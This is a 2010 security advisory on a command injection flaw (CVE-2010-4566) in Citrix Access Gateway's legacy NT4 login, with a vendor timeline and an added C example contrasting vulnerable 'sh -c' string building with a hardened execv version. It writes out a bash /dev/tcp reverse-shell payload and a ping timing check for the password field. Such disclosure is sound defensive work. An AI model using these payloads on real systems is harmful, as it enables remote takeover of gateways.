-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Citrix Access Gateway Command Injection Vulnerability
Release Date: 2010-12-21
Application: Citrix Access Gateway
Versions: Access Gateway Enterprise Edition (up to 9.2-49.8)
Access Gateway Standard & Advanced Edition (prior to 5.0)
Severity: High
Author: George D. Gal <ggal (at) vsecurity (dot) com>
Vendor Status: Updated Software Released, NT4 Authentication Removed [2]
CVE Candidate: CVE-2010-4566
Reference: http://www.vsecurity.com/resources/advisory/20101221-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
-------------------
From [1]:
"Citrix(R) Access Gateway(TM) is a secure application access solution that
provides administrators granular application-level control while
empowering users with remote access from anywhere. It gives IT
administrators a single point to manage access control and limit actions
within sessions based on both user identity and the endpoint device,
providing better application security, data protection, and compliance
management."
Vulnerability Overview
----------------------
On August 2nd, VSR identified a vulnerability in Citrix Access Gateway in
the way user authentication credentials are handled. Under certain
configuration settings, user credentials are passed as arguments to a
command line program to authenticate the user. The lack of input
validation, combined with the mechanism by which the external program is
spawned (via a shell), results in the potential for command injection and
arbitrary command execution on the Access Gateway.
Vulnerability Details
---------------------
The Citrix Access Gateway provides support for multiple authentication types.
When utilizing the external legacy NTLM authentication module known as
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
line utility to verify a user's identity and password. By embedding shell
metacharacters in the web authentication form it is possible to execute
arbitrary commands on the Access Gateway.
The following commands are executed by the ntlm_authenticator during this
process:
vpnadmin 10130 0.0 0.0 2104 976 ? S 15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U <<username>>%<<password>> -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null
vpnadmin 10131 0.0 0.1 3852 1528 ? S 15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U <<username>>%XXXXXXXX -p 139 -S xxx.xxx.xxx.xxx
By submitting a password value as shown below, it is possible to establish a
reverse shell to a netcat listener:
| bash -i >& /dev/tcp/<<HOST>>/<<PORT>> 0>&1 &
Using a simple ping command in the password field, an attacker could use a
timing-based check to verify the presence of the vulnerability:
| ping -c 10 <<HOST>>
The ping command above will attempt to send 10 ICMP echo requests to the
target host, resulting in a noticeable delay that is easily detected by
vulnerability scanners.
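The two process listings above show the root cause: the credentials are spliced into a single string that is handed to "sh -c", so the password is parsed as shell syntax. The following C program is an added illustration (it is not Citrix, Samba or VSR code) that contrasts that string-building pattern with a hardened equivalent that validates the username and execs samedit directly through an argv array, with no shell in between. It assumes the samedit path and argument layout shown in the listing; the sample credentials, the server address and the helper names (build_shell_command, has_shell_metachar, build_samedit_argv, run_samedit) are constructed for this example. The has_shell_metachar helper also serves the detection point made above: a login form value containing shell metacharacters is the signal a filter or scanner rule should key on.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Path and argument order taken from the advisory's process listing. */
#define SAMEDIT_PATH "/usr/local/samba/bin/samedit"
#define MAX_CRED 128   /* constructed limit for this example */

/* Vulnerable pattern: untrusted credentials are interpolated into one string
 * that is then handed to "sh -c". Whatever the user typed is parsed as shell
 * syntax, so a metacharacter in the password terminates the samedit command
 * and starts a new one. Returns 1 if the command fit in the buffer. */
int build_shell_command(char *out, size_t outlen,
                        const char *user, const char *pass, const char *server)
{
    int n = snprintf(out, outlen,
                     SAMEDIT_PATH " -c 'samuser %s -a' -U %s%%%s -p 139 -S %s "
                     "> /tmp/samedit-samuser-stdout.XXXX 2> /dev/null",
                     user, user, pass, server);
    return n > 0 && (size_t)n < outlen;
}

/* Detection aid: does a submitted value contain characters a POSIX shell
 * would interpret? Returns 1 if so. */
int has_shell_metachar(const char *s)
{
    static const char meta[] = "|&;<>()$`\\\"'\n*?[]#~ \t";
    for (; *s; s++)
        if (strchr(meta, *s))
            return 1;
    return 0;
}

/* Hardened pattern: no shell at all. Each value becomes exactly one argv
 * element, so samedit receives metacharacters as literal bytes. The username
 * is additionally restricted to a conservative character set because it is
 * also embedded in the "samuser <name> -a" sub-command string. */
typedef struct {
    char samcmd[MAX_CRED + 16];
    char cred[2 * MAX_CRED + 2];
    char server[64];
    char *argv[10];
} samedit_args;

int validate_username(const char *user)
{
    size_t len = strlen(user);
    if (len == 0 || len >= MAX_CRED)
        return 0;
    for (; *user; user++)
        if (!isalnum((unsigned char)*user) && !strchr("._-", *user))
            return 0;
    return 1;
}

/* Fills the argv array; returns 1 on success, 0 if an input is rejected. */
int build_samedit_argv(samedit_args *a, const char *user,
                       const char *pass, const char *server)
{
    if (!validate_username(user) || strlen(pass) >= MAX_CRED ||
        strlen(server) >= sizeof a->server)
        return 0;
    snprintf(a->samcmd, sizeof a->samcmd, "samuser %s -a", user);
    snprintf(a->cred, sizeof a->cred, "%s%%%s", user, pass);
    snprintf(a->server, sizeof a->server, "%s", server);
    a->argv[0] = (char *)SAMEDIT_PATH;
    a->argv[1] = (char *)"-c";  a->argv[2] = a->samcmd;
    a->argv[3] = (char *)"-U";  a->argv[4] = a->cred;
    a->argv[5] = (char *)"-p";  a->argv[6] = (char *)"139";
    a->argv[7] = (char *)"-S";  a->argv[8] = a->server;
    a->argv[9] = NULL;
    return 1;
}

/* Runs the prepared argv with fork/execv (no /bin/sh in between) and returns
 * the child's exit status, or -1 on failure. */
int run_samedit(const samedit_args *a)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(a->argv[0], a->argv);
        _exit(127);               /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a username and a password carrying a pipe. */
    const char *server = "192.0.2.10";
    const char *pass = "hunter2 | id";
    char cmd[512];
    samedit_args a;

    build_shell_command(cmd, sizeof cmd, "alice", pass, server);
    printf("sh -c would parse : %s\n", cmd);
    printf("metachar present  : %d\n", has_shell_metachar(pass));
    if (build_samedit_argv(&a, "alice", pass, server))
        printf("argv[4] as literal: %s\n", a.argv[4]);
    /* run_samedit(&a) is not invoked here: samedit is absent on a workstation. */
    return 0;
}
```

The essential difference is not the character filter but the exec path: in the hardened form the password never passes through a shell parser, so filtering is defence in depth rather than the only barrier. Rejecting metacharacters in the username is still worthwhile because that value is reused inside the samuser sub-command string.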
Versions Affected
-----------------
Testing was performed against a Citrix Access Gateway 2000 version 4.5.7.
According to the vendor this vulnerability affects all versions of Access
Gateway Enterprise Edition up to version 9.2-49.8, and all versions of
the Access Gateway Standard and Advanced Editions prior to Access Gateway
5.0.
Vendor Response
---------------
The following timeline details the vendor's response to the reported issue:
2010-08-06 Citrix was provided a draft advisory.
2010-08-10 Citrix acknowledged receipt of draft advisory.
2010-08-16 VSR follow-up to determine confirmation of issue.
2010-08-16 Citrix confirmed issue.
2010-09-14 VSR follow-up to determine status of issue.
2010-09-29 VSR follow-up to determine status of issue.
2010-09-30 Citrix confirmed continued investigation of the issue.
2010-10-19 VSR follow-up to determine status of issue.
2010-10-26 Citrix verified issue only exists in NT4 authentication feature.
2010-12-01 VSR follow-up to determine status of issue.
2010-12-02 Citrix confirmed December 14th release of security bulletin.
2010-12-14 Citrix releases security bulletin.
2010-12-20 CVE assigned.
2010-12-21 VSR releases advisory.
The Citrix advisory may be obtained at:
http://support.citrix.com/article/CTX127613
Recommendation
--------------
Citrix has indicated that this vulnerability only affects legacy NT4
authentication which has been removed from the latest release of the
device firmware.
Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-4566 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
Acknowledgements
----------------
VSR would like to thank Citrix for the coordinated release of this advisory.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. Citrix Access Gateway
http://citrix.com/accessgateway/overview
2. Citrix Access Gateway - Vendor Security Bulletin
http://support.citrix.com/article/CTX127613
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety. This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose. Neither Virtual Security Research, LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.
See the VSR disclosure policy for more information on our responsible
disclosure practices:
http://www.vsecurity.com/company/disclosure
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-